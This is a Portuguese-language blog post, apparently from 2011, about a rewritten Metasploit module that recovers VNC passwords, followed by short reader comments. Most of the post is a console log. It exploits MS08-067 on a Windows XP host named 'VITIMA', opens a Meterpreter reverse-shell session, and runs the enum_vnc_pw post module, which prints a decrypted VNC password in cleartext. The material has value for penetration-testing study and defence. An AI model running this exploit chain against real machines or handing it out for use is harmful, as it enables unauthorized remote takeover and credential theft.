Recentemente Chris Gate escreveu sobre o getvncpw, está feature do payload MSF Meterpreter quebra o algoritmo DES de senhas do *VNC.
Rob Fuller aka mubix reescreveu o módulo adicionando várias funcionalidades e melhorias, como ele ainda não está integrado ao MSF poderá ser baixado AQUI
Vamos aos testes
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 11.11.11.11:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:Portuguese – Brazilian
[*] Selected Target: Windows XP SP3 Portuguese – Brazilian (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (749056 bytes) to 11.11.11.11
[*] Meterpreter session 2 opened (11.11.11.12:4444 -> 11.11.11.11:1032) at Mon Mar 21 15:57:38 -0300 2011
meterpreter > background
msf exploit(ms08_067_netapi) > use post/windows/gather/enum_vnc_pw
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
msf post(enum_vnc_pw) > run
[*] Enumerating VNC passwords on VITIMA
[*] Checking UltraVNC…
[*] Checking WinVNC3_HKLM…
[*] Checking WinVNC3_HKCU…
[*] Checking WinVNC3_HKLM_Default…
[*] Checking WinVNC3_HKCU_Default…
[*] Checking WinVNC_HKLM_Default…
[*] Checking WinVNC_HKCU_Default…
[*] Checking WinVNC4_HKLM…
[+] WinVNC4_HKLM => 2101f4d191cf99ca => DcLabsgays on port: <== OLHE A SENHA AQUI ;-P [*] Checking WinVNC4_HKCU... [*] Checking RealVNC_HKLM... [*] Checking RealVNC_HKCU... [*] Checking TightVNC_HKLM... [*] Checking TightVNC_HKLM_Control_pass... [*] Post module execution completed msf post(enum_vnc_pw) >
Com certeza este é um excelente módulo. Cuidado com seus VNCs jejejejejeje!!!!!
Só vc mesmo!! Bailarina! Só faltou um viodezinho demo hein? Faz ai pra gente!
srsr,
rodar o exploit, kkkk
muito bom.
abraços